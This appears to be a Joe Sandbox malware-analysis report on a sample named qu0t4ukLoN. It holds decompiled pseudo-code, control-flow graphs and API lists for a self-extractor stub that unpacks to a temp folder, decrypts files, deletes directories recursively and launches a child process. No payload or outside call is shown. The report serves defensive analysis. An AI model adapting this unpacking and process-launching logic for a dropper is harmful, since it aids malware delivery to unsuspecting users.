                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L14;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t49 =  *0xa98a24;
                                                                                                                                                                                                        				if( *0xa98a24 != 0) {
                                                                                                                                                                                                        					L4:
                                                                                                                                                                                                        					_t34 = E00A93A3F(_t51);
                                                                                                                                                                                                        					_t52 = _t34;
                                                                                                                                                                                                        					if(_t34 == 0) {
                                                                                                                                                                                                        						goto L16;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L5;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(E00A951E5(_t49) == 0) {
                                                                                                                                                                                                        					goto L16;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t51 =  *0xa98a38;
                                                                                                                                                                                                        				if( *0xa98a38 != 0) {
                                                                                                                                                                                                        					goto L5;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				goto L4;
                                                                                                                                                                                                        			}


                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00A92F93
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00A92FB2
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00A92FC6
                                                                                                                                                                                                        • DecryptFileA.ADVAPI32 ref: 00A92FE6
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00A92FF8
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00A9301C
                                                                                                                                                                                                          • Part of subcall function 00A951E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00A92F4D,?,00000002,00000000), ref: 00A95201
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                        • API String ID: 2126469477-58291647
                                                                                                                                                                                                        • Opcode ID: 331c74a5879df588b9ec5ec279f50c3142a03ecd63a02de67d1593419ec899d7
                                                                                                                                                                                                        • Instruction ID: a833c30ea14a48bec16a2f618b59078a450034adc6ff38a11f344684fa0940af
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 331c74a5879df588b9ec5ec279f50c3142a03ecd63a02de67d1593419ec899d7
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3241A832B00205AADF30EBB99D4976B33F8EB55790F11016BE941C2591EF78CE82CB65
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 522 a95467-a95484 523 a9548a-a95490 call a953a1 522->523 524 a9551c-a95528 call a91680 522->524 527 a95495-a95497 523->527 528 a9552d-a95539 call a958c8 524->528 529 a9549d-a954c0 call a91781 527->529 530 a95581-a95583 527->530 537 a9553b-a95545 CreateDirectoryA 528->537 538 a9554d-a95552 528->538 539 a9550c-a9551a call a9658a 529->539 540 a954c2-a954d8 GetSystemInfo 529->540 533 a9558d-a9559d call a96ce0 530->533 542 a95577-a9557c call a96285 537->542 543 a95547 537->543 544 a95585-a9558b 538->544 545 a95554-a95557 call a9597d 538->545 539->528 548 a954da-a954dd 540->548 549 a954fe 540->549 542->530 543->538 544->533 555 a9555c-a9555e 545->555 553 a954df-a954e2 548->553 554 a954f7-a954fc 548->554 556 a95503-a95507 call a9658a 549->556 558 a954f0-a954f5 553->558 559 a954e4-a954e7 553->559 554->556 555->544 560 a95560-a95566 555->560 556->539 558->556 559->539 562 a954e9-a954ee 559->562 560->530 561 a95568-a95575 RemoveDirectoryA 560->561 561->530 562->556
                                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                                        			E00A95467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				struct _SYSTEM_INFO _v304;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t10;
                                                                                                                                                                                                        				void* _t13;
                                                                                                                                                                                                        				intOrPtr _t14;
                                                                                                                                                                                                        				void* _t16;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				signed int _t26;
                                                                                                                                                                                                        				void* _t28;
                                                                                                                                                                                                        				void* _t29;
                                                                                                                                                                                                        				CHAR* _t48;
                                                                                                                                                                                                        				signed int _t49;
                                                                                                                                                                                                        				intOrPtr _t61;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t10 =  *0xa98004; // 0x6298f871
                                                                                                                                                                                                        				_v8 = _t10 ^ _t49;
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				if(__edx == 0) {
                                                                                                                                                                                                        					_t48 = 0xa991e4;
                                                                                                                                                                                                        					_t42 = 0x104;
                                                                                                                                                                                                        					E00A91680(0xa991e4, 0x104);
                                                                                                                                                                                                        					L14:
                                                                                                                                                                                                        					_t13 = E00A958C8(_t48); // executed
                                                                                                                                                                                                        					if(_t13 != 0) {
                                                                                                                                                                                                        						L17:
                                                                                                                                                                                                        						_t42 = _a4;
                                                                                                                                                                                                        						if(_a4 == 0) {
                                                                                                                                                                                                        							L23:
                                                                                                                                                                                                        							 *0xa99124 = 0;
                                                                                                                                                                                                        							_t14 = 1;
                                                                                                                                                                                                        							L24:
                                                                                                                                                                                                        							return E00A96CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t16 = E00A9597D(_t48, _t42, 1, 0); // executed
                                                                                                                                                                                                        						if(_t16 != 0) {
                                                                                                                                                                                                        							goto L23;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t61 =  *0xa98a20; // 0x0
                                                                                                                                                                                                        						if(_t61 != 0) {
                                                                                                                                                                                                        							 *0xa98a20 = 0;
                                                                                                                                                                                                        							RemoveDirectoryA(_t48);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						L22:
                                                                                                                                                                                                        						_t14 = 0;
                                                                                                                                                                                                        						goto L24;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                                                                                                                                                        						 *0xa99124 = E00A96285();
                                                                                                                                                                                                        						goto L22;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *0xa98a20 = 1;
                                                                                                                                                                                                        					goto L17;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t42 =  &_v268;
                                                                                                                                                                                                        				_t20 = E00A953A1(__ecx,  &_v268); // executed
                                                                                                                                                                                                        				if(_t20 == 0) {
                                                                                                                                                                                                        					goto L22;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_t48 = 0xa991e4;
                                                                                                                                                                                                        				E00A91781(0xa991e4, 0x104, __ecx,  &_v268);
                                                                                                                                                                                                        				if(( *0xa99a34 & 0x00000020) == 0) {
                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                        					_t42 = 0x104;
                                                                                                                                                                                                        					E00A9658A(_t48, 0x104, 0xa91140);
                                                                                                                                                                                                        					goto L14;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				GetSystemInfo( &_v304);
                                                                                                                                                                                                        				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                                                                                                                                                        				if(_t26 == 0) {
                                                                                                                                                                                                        					_push("i386");
                                                                                                                                                                                                        					L11:
                                                                                                                                                                                                        					E00A9658A(_t48, 0x104);
                                                                                                                                                                                                        					goto L12;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t28 = _t26 - 1;
                                                                                                                                                                                                        				if(_t28 == 0) {
                                                                                                                                                                                                        					_push("mips");
                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t29 = _t28 - 1;
                                                                                                                                                                                                        				if(_t29 == 0) {
                                                                                                                                                                                                        					_push("alpha");
                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t29 != 1) {
                                                                                                                                                                                                        					goto L12;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_push("ppc");
                                                                                                                                                                                                        				goto L11;
                                                                                                                                                                                                        			}

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A954C9
                                                                                                                                                                                                        • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A9553D
                                                                                                                                                                                                        • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A9556F
                                                                                                                                                                                                          • Part of subcall function 00A953A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A953FB
                                                                                                                                                                                                          • Part of subcall function 00A953A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A95402
                                                                                                                                                                                                          • Part of subcall function 00A953A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A9541F
                                                                                                                                                                                                          • Part of subcall function 00A953A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A9542B
                                                                                                                                                                                                          • Part of subcall function 00A953A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A95434
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                        • API String ID: 1979080616-186922987
                                                                                                                                                                                                        • Opcode ID: 019e83e2a9e843aaae6e1ba322b291924334c12233786091af219ae4b2bd76dc
                                                                                                                                                                                                        • Instruction ID: 1a5339ee3879f4dccc142557a0bca129dfbf39e2eeaa8835f2345baf5bd5391e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 019e83e2a9e843aaae6e1ba322b291924334c12233786091af219ae4b2bd76dc
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 68313571F00A01ABCF16AFB99D4697F73EBBB85340F16012BA906DA552DF70CE028785
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                        			E00A92390(CHAR* __ecx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v276;
                                                                                                                                                                                                        				char _v280;
                                                                                                                                                                                                        				char _v284;
                                                                                                                                                                                                        				struct _WIN32_FIND_DATAA _v596;
                                                                                                                                                                                                        				struct _WIN32_FIND_DATAA _v604;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t21;
                                                                                                                                                                                                        				int _t36;
                                                                                                                                                                                                        				void* _t46;
                                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                                        				CHAR* _t65;
                                                                                                                                                                                                        				void* _t66;
                                                                                                                                                                                                        				signed int _t67;
                                                                                                                                                                                                        				signed int _t69;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                                                                                                                                                        				_t21 =  *0xa98004; // 0x6298f871
                                                                                                                                                                                                        				_t22 = _t21 ^ _t69;
                                                                                                                                                                                                        				_v8 = _t21 ^ _t69;
                                                                                                                                                                                                        				_t65 = __ecx;
                                                                                                                                                                                                        				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                                                                                                                                                        					L10:
                                                                                                                                                                                                        					_pop(_t62);
                                                                                                                                                                                                        					_pop(_t66);
                                                                                                                                                                                                        					_pop(_t46);
                                                                                                                                                                                                        					return E00A96CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					E00A91680( &_v276, 0x104, __ecx);
                                                                                                                                                                                                        					_t58 = 0x104;
                                                                                                                                                                                                        					E00A916B3( &_v280, 0x104, "*");
                                                                                                                                                                                                        					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                                                                                                                                                        					_t63 = _t22;
                                                                                                                                                                                                        					if(_t63 == 0xffffffff) {
                                                                                                                                                                                                        						goto L10;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						goto L3;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					do {
                                                                                                                                                                                                        						L3:
                                                                                                                                                                                                        						_t58 = 0x104;
                                                                                                                                                                                                        						E00A91680( &_v276, 0x104, _t65);
                                                                                                                                                                                                        						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                                                                                                                                                        							_t58 = 0x104;
                                                                                                                                                                                                        							E00A916B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                                                                                                                                                        							SetFileAttributesA( &_v280, 0x80);
                                                                                                                                                                                                        							DeleteFileA( &_v280);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                                                                                                                                                        								E00A916B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                                                                                                                                                        								_t58 = 0x104;
                                                                                                                                                                                                        								E00A9658A( &_v280, 0x104, 0xa91140);
                                                                                                                                                                                                        								E00A92390( &_v284);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                                                                                                                                                        					} while (_t36 != 0);
                                                                                                                                                                                                        					FindClose(_t63); // executed
                                                                                                                                                                                                        					_t22 = RemoveDirectoryA(_t65); // executed
                                                                                                                                                                                                        					goto L10;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}






















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindFirstFileA.KERNELBASE(?,00A98A3A,00A911F4,00A98A3A,00000000,?,?), ref: 00A923F6
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(?,00A911F8), ref: 00A92427
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(?,00A911FC), ref: 00A9243B
                                                                                                                                                                                                        • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00A92495
                                                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00A924A3
                                                                                                                                                                                                        • FindNextFileA.KERNELBASE(00000000,00000010), ref: 00A924AF
                                                                                                                                                                                                        • FindClose.KERNELBASE(00000000), ref: 00A924BE
                                                                                                                                                                                                        • RemoveDirectoryA.KERNELBASE(00A98A3A), ref: 00A924C5
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 836429354-0
                                                                                                                                                                                                        • Opcode ID: a68b9ed4b1ed5cec6d133ca370bd651c0782fce033b1966d4d3ae81eb6b1f479
                                                                                                                                                                                                        • Instruction ID: 651cd56c74a6c6e13e78586ee337725a317d368169a893b838fd471a5e2a8a37
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a68b9ed4b1ed5cec6d133ca370bd651c0782fce033b1966d4d3ae81eb6b1f479
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 31316D32704641ABCB21EBA4DD89AEB73ECABC4305F14492FB59586290EF3499498792
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 675 a93fef-a94010 676 a9410a-a9411a call a96ce0 675->676 677 a94016-a9403b CreateProcessA 675->677 678 a94041-a9406e WaitForSingleObject GetExitCodeProcess 677->678 679 a940c4-a94101 call a96285 GetLastError FormatMessageA call a944b9 677->679 682 a94091 call a9411b 678->682 683 a94070-a94077 678->683 691 a94106 679->691 690 a94096-a940b8 CloseHandle * 2 682->690 683->682 686 a94079-a9407b 683->686 686->682 689 a9407d-a94089 686->689 689->682 692 a9408b 689->692 693 a94108 690->693 694 a940ba-a940c0 690->694 691->693 692->682 693->676 694->693 695 a940c2 694->695 695->691
                                                                                                                                                                                                        C-Code - Quality: 84%
                                                                                                                                                                                                        			E00A93FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v524;
                                                                                                                                                                                                        				long _v528;
                                                                                                                                                                                                        				struct _PROCESS_INFORMATION _v544;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t20;
                                                                                                                                                                                                        				void* _t22;
                                                                                                                                                                                                        				int _t25;
                                                                                                                                                                                                        				intOrPtr* _t39;
                                                                                                                                                                                                        				signed int _t44;
                                                                                                                                                                                                        				void* _t49;
                                                                                                                                                                                                        				signed int _t50;
                                                                                                                                                                                                        				intOrPtr _t53;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t45 = __edx;
                                                                                                                                                                                                        				_t20 =  *0xa98004; // 0x6298f871
                                                                                                                                                                                                        				_v8 = _t20 ^ _t50;
                                                                                                                                                                                                        				_t39 = __ecx;
                                                                                                                                                                                                        				_t49 = 1;
                                                                                                                                                                                                        				_t22 = 0;
                                                                                                                                                                                                        				if(__ecx == 0) {
                                                                                                                                                                                                        					L13:
                                                                                                                                                                                                        					return E00A96CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                        				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                                                                                                                                                        				if(_t25 == 0) {
                                                                                                                                                                                                        					 *0xa99124 = E00A96285();
                                                                                                                                                                                                        					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
                                                                                                                                                                                                        					_t45 = 0x4c4;
                                                                                                                                                                                                        					E00A944B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
                                                                                                                                                                                                        					L11:
                                                                                                                                                                                                        					_t49 = 0;
                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                        					_t22 = _t49;
                                                                                                                                                                                                        					goto L13;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                                                                                                                                                        				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                                                                                                                                                        				_t44 = _v528;
                                                                                                                                                                                                        				_t53 =  *0xa98a28; // 0x0
                                                                                                                                                                                                        				if(_t53 == 0) {
                                                                                                                                                                                                        					_t34 =  *0xa99a2c; // 0x0
                                                                                                                                                                                                        					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                                                                                                                                                        						_t34 = _t44 & 0xff000000;
                                                                                                                                                                                                        						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                                                                                                                                                        							 *0xa99a2c = _t44;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				E00A9411B(_t34, _t44);
                                                                                                                                                                                                        				CloseHandle(_v544.hThread);
                                                                                                                                                                                                        				CloseHandle(_v544);
                                                                                                                                                                                                        				if(( *0xa99a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                                                                                                                                                        					goto L12;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CreateProcessA.KERNELBASE ref: 00A94033
                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00A94049
                                                                                                                                                                                                        • GetExitCodeProcess.KERNELBASE ref: 00A9405C
                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00A9409C
                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00A940A8
                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00A940DC
                                                                                                                                                                                                        • FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 00A940E9
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3183975587-0
                                                                                                                                                                                                        • Opcode ID: 89356e9aa8ef34b0c2d63b2346076741f8f8a11d1c687008f3e90c6f36733d21
                                                                                                                                                                                                        • Instruction ID: 649ba6ec411f29755cb86668b98fbbd553266052fdb9c4b67712aa9d0dc5b667
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 89356e9aa8ef34b0c2d63b2346076741f8f8a11d1c687008f3e90c6f36733d21
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5E31AF31740208ABEF209BA5DC49FAB77B8EB98700F2002ABF505D2160CE344C83CA51
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 70%
                                                                                                                                                                                                        			E00A92BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                                        				long _t4;
                                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                                        				intOrPtr _t7;
                                                                                                                                                                                                        				void* _t9;
                                                                                                                                                                                                        				struct HINSTANCE__* _t12;
                                                                                                                                                                                                        				intOrPtr* _t17;
                                                                                                                                                                                                        				signed char _t19;
                                                                                                                                                                                                        				intOrPtr* _t21;
                                                                                                                                                                                                        				void* _t22;
                                                                                                                                                                                                        				void* _t24;
                                                                                                                                                                                                        				intOrPtr _t32;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t4 = GetVersion();
                                                                                                                                                                                                        				if(_t4 >= 0 && _t4 >= 6) {
                                                                                                                                                                                                        					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                                                                                                                                                        					if(_t12 != 0) {
                                                                                                                                                                                                        						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                                                                                                                                                        						if(_t21 != 0) {
                                                                                                                                                                                                        							_t17 = _t21;
                                                                                                                                                                                                        							 *0xa9a288(0, 1, 0, 0);
                                                                                                                                                                                                        							 *_t21();
                                                                                                                                                                                                        							_t29 = _t24 - _t24;
                                                                                                                                                                                                        							if(_t24 != _t24) {
                                                                                                                                                                                                        								_t17 = 4;
                                                                                                                                                                                                        								asm("int 0x29");
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t20 = _a12;
                                                                                                                                                                                                        				_t18 = _a4;
                                                                                                                                                                                                        				 *0xa99124 = 0;
                                                                                                                                                                                                        				if(E00A92CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                                                                                                                                                        					_t9 = E00A92F1D(_t18, _t20); // executed
                                                                                                                                                                                                        					_t22 = _t9; // executed
                                                                                                                                                                                                        					E00A952B6(0, _t18, _t21, _t22); // executed
                                                                                                                                                                                                        					if(_t22 != 0) {
                                                                                                                                                                                                        						_t32 =  *0xa98a3a; // 0x0
                                                                                                                                                                                                        						if(_t32 == 0) {
                                                                                                                                                                                                        							_t19 =  *0xa99a2c; // 0x0
                                                                                                                                                                                                        							if((_t19 & 0x00000001) != 0) {
                                                                                                                                                                                                        								E00A91F90(_t19, _t21, _t22);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t6 =  *0xa98588; // 0x0
                                                                                                                                                                                                        				if(_t6 != 0) {
                                                                                                                                                                                                        					CloseHandle(_t6);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t7 =  *0xa99124; // 0x80070002
                                                                                                                                                                                                        				return _t7;
                                                                                                                                                                                                        			}



















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetVersion.KERNEL32(?,00000002,00000000,?,00A96BB0,00A90000,00000000,00000002,0000000A), ref: 00A92C03
                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00A96BB0,00A90000,00000000,00000002,0000000A), ref: 00A92C18
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00A92C28
